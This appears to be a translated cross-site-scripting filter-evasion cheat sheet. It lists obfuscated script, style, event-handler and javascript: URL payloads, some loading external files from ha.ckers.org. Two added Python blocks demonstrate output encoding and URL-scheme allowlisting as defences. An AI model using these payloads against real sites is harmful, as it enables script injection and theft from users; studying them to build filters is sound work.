1. Change character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with a different one

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

Example (contents of the CSS file):

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
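Items 1, 2 and 5 all defeat the same kind of defence: a blacklist regex that matches one literal spelling of the script tag. The following Python is added here as an illustration (it is not part of the original post); the naive filter, the detection helper and the sample list are constructed for the example. It runs the page's own payloads through a case-sensitive blacklist and then through output encoding with `html.escape`, which makes the spelling of the tag irrelevant because no `<` survives to reach the HTML parser.

```python
import html
import re

# Constructed example of a naive blacklist filter: it only knows the literal,
# lower-case tag, so a case change or an extra character walks straight past it.
NAIVE_SCRIPT_RE = re.compile(r"<script>")


def naive_strip(fragment: str) -> str:
    """Blacklist approach: delete the one spelling of the tag we thought of."""
    return NAIVE_SCRIPT_RE.sub("", fragment)


def contains_active_markup(fragment: str) -> bool:
    """Detection view: '<' followed by a letter or '/' opens a tag in HTML."""
    return re.search(r"<[a-zA-Z/]", fragment) is not None


def render_untrusted(text: str) -> str:
    """Output encoding: escape every character that has meaning to the HTML
    parser, so the browser shows the string as text and never as markup."""
    return html.escape(text, quote=True)


# Payloads taken from items 1, 2 and 5 above (constructed sample list).
SAMPLES = [
    "<sCript>alert('d')</scRipT>",
    "<<script>alert('c')//<</script>",
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
    '<SCRIPT/SRC="t.js"></SCRIPT>',
]


def evaluate(samples):
    """For each payload, report whether a tag is still present after the
    blacklist filter and after output encoding."""
    results = []
    for s in samples:
        results.append({
            "input": s,
            "naive_still_has_tag": contains_active_markup(naive_strip(s)),
            "escaped_has_tag": contains_active_markup(render_untrusted(s)),
        })
    return results


if __name__ == "__main__":
    for r in evaluate(SAMPLES):
        print(f"{r['input']!r}: blacklist leaves tag={r['naive_still_has_tag']}, "
              f"escaped leaves tag={r['escaped_has_tag']}")
```

The lesson the block makes concrete: every payload in the list survives the blacklist (the second one survives even though `<script>` was removed, because `</script>` and the leading `<<` remain), while none survives encoding. The defence is to encode at the output sink for the context (HTML body, attribute, URL), not to recognise attack spellings on input.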
6. Use tab or newline characters to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> newline

(The separators inside "javascript" are rendered as spaces on this page; in the first form they are tab characters, in the second they are newlines.)

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The hex-encoded variants were decoded when this page was rendered, so the first line of each pair appears identical to its source.)

9. Script in HTML tags (event handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code embedded in an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href and url attributes

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
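Items 6, 8 and 14 are all variations on one theme: a `javascript:` URL placed in an attribute that takes a URL, with the scheme disguised by case, by tabs or newlines inside the word, or by HTML entity encoding that the browser decodes before it parses the URL. The defensive counterpart is a scheme allowlist applied only after the value has been normalised the way a browser would see it. The following Python is added here as an illustration and is not part of the original post; `ALLOWED_SCHEMES`, `normalize_url`, `is_safe_url` and the sample inputs are constructed for the example, and the normalisation (entity decoding, then dropping ASCII control characters and whitespace) is a simplification of what browsers do to URLs.

```python
import html
from urllib.parse import urlsplit

# Constructed allowlist: absolute http(s) URLs and relative paths (empty scheme).
# Anything else, including javascript:, data: and vbscript:, is rejected.
ALLOWED_SCHEMES = {"http", "https", ""}


def normalize_url(raw: str) -> str:
    """Bring the value into the form a browser would evaluate.

    1. Decode HTML character references (the attribute value is HTML, so
       '&#106;avascript:' becomes 'javascript:' before URL parsing).
    2. Drop ASCII control characters and whitespace (tab, newline, CR, ...),
       which browsers ignore inside a URL, so 'jav<TAB>ascript:' collapses.
    """
    decoded = html.unescape(raw)
    return "".join(ch for ch in decoded if ord(ch) > 0x20 and ch != "\x7f")


def is_safe_url(raw: str) -> bool:
    """True only if the normalised scheme is on the allowlist.

    The comparison is case-insensitive, so JaVaScRiPt: is caught as well.
    """
    cleaned = normalize_url(raw)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def check_all(values):
    """Return {value: verdict} for a batch of attribute values."""
    return {v: is_safe_url(v) for v in values}


# Constructed sample inputs drawn from the forms shown in items 6, 8 and 14.
SAMPLE_VALUES = [
    "https://example.com/static/app.js",      # assumed legitimate absolute URL
    "/static/app.js",                         # relative URL, empty scheme
    "javascript:alert('XSS27')",              # plain javascript: scheme
    "JaVaScRiPt:alert('XSS')",                # case variation
    "jav\tascr\nipt:alert('XSS3')",           # tab and newline inside the scheme
    "&#106;avascript:alert('XSS')",           # first letter as an HTML entity
]

if __name__ == "__main__":
    for value, ok in check_all(SAMPLE_VALUES).items():
        print(f"{'ALLOW' if ok else 'REJECT':6} {value!r}")
```

Two points for anyone adapting this: validate the value in this normalised form and then write the normalised (or the original, if it passed) value into the attribute with proper attribute encoding, never the raw input; and keep the check an allowlist, because a blacklist of scheme spellings is exactly what items 6 and 8 are written to beat. This does not cover CSS contexts (items 4 and 7), where the practical rule is not to let user input reach a style attribute or stylesheet at all.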